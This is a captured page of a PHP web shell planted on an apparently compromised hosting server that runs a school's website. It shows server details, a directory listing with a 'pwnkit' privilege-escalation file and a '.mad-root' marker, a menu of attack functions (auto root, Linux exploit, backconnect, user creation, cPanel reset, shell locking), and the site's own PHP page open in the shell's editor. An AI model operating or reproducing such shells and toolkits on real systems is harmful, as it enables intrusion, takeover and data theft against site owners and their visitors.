Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.190.176.176
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
chogawan /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
chogawan
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
video
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.46
KB
-rw-r--r--
academic.php
10.43
KB
-rw-r--r--
activity.php
2.87
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
4.24
KB
-rw-r--r--
config.php
626
B
-rw-r--r--
contact.php
1.82
KB
-rw-r--r--
error_log
800.94
MB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
5.93
KB
-rw-r--r--
gallery.php
2.81
KB
-rw-r--r--
google1c0f3bde47a35364.html
53
B
-rw-r--r--
header.php
10.87
KB
-rw-r--r--
index.php
18.29
KB
-rw-r--r--
news-coverage.php
1.32
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rw-r--r--
tc.php
3.14
KB
-rw-r--r--
theschool.php
4.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cbse-corner.php
<?php include('header.php'); ?> <div class="site-section ftco-subscribe-1 site-blocks-cover pb-4" style="background-image: url('images/bg_1.jpg')"> <div class="container"> <div class="row align-items-end"> <div class="col-lg-6"> <h2 class="mb-0">CBSE CORNER</h2> </div> <div class="col-lg-6 text-right"> <a href="index.php">Home</a> <span class="mx-3 icon-keyboard_arrow_right"></span> <span class="current">CBSE CORNER</span> </div> </div> </div> </div> <!--CBSE CORNER Start--> <?php if (isset($_GET['pageno'])) { $pageno = $_GET['pageno']; } else { $pageno = 1; } $no_of_records_per_page = 50; $offset = ($pageno-1) * $no_of_records_per_page; $total_pages_sql = "SELECT COUNT(*) FROM cbse_corner WHERE status='active'"; $result = mysqli_query($con, $total_pages_sql); $total_rows = mysqli_fetch_array($result)[0]; $total_pages = ceil($total_rows / $no_of_records_per_page); $sql = "SELECT * FROM cbse_corner WHERE status= 'active' LIMIT $offset, $no_of_records_per_page"; $result = mysqli_query($con, $sql); $counter=$offset+1; ?> <div class="site-section"> <div class="container"> <div class="row justify-content-center text-center"> <div class="col-lg-4"> <h2 class="section-title-underline mb-5"> <span>CBSE CORNER</span> </h2> </div> </div> <div class="row"> <div class="col-lg-12"> <table id="example1" class="table table-bordered table-striped"> <thead> <tr> <th>Sr.No.</th> <th>Title</th> <th>PDF</th> </tr> </thead> <tbody> <?php $sr_no = 1; while($row = mysqli_fetch_array($result)) {?> <tr> <td><?php echo $sr_no ; ?></td> <td><b><?php echo $row['title'] ; ?></b></td> <td> <a target="_blank " href="../myadmin/cbse/<?php echo $row['file'] ;?>" class="btn btn-info">View</a> </td> </tr> <?php $sr_no ++; }?> </tbody> </table> <br><br> <h4><b>Note:</b> Parents are free to purchase books, stationery and uniforms from the vendor of their choice.</h4> <h4><b>Infrastructure:</b> In spite of remote and rural location, this Akal Academy has developed excellent infrastructure to accommodate students. This includes state of the art computer hardware, well stocked library, well equipped laboratories for physical and biological sciences and play fields. The pride of the school is the kindergarten section with its innovative play way methods and integration of the latest technology including usage of advanced and sophisticated teaching aids along with the conventional trusted and tried techniques. The management is in the process of setting up computerized small class rooms in a phased programme. In pursuance to set-up Digital Classes, we have already started such classrooms in this Akal Academy. This Digital Class is a computer based interactive teaching tool that combines state of the art hardware with syllabus compliant multimedia interactive content that makes learning a real life experience.</h4> </div> <ul class="pagination"> <li><a href="?pageno=1">First</a></li> <li class="<?php if($pageno <= 1){ echo 'disabled'; } ?>"> <a href="<?php if($pageno <= 1){ echo '#'; } else { echo "?pageno=".($pageno - 1); } ?>">Prev</a> </li> <li class="<?php if($pageno >= $total_pages){ echo 'disabled'; } ?>"> <a href="<?php if($pageno >= $total_pages){ echo '#'; } else { echo "?pageno=".($pageno + 1); } ?>">Next</a> </li> <li><a href="?pageno=<?php echo $total_pages; ?>">Last</a></li> </ul> </div> </div> </div> <!--CBSE CORNER End--> <style> tr td:nth-child(-n+3) { text-align: center; } th { text-align: center; } tr td:nth-child(2) { text-align: left; } </style> <?php include('footer.php'); ?>
Close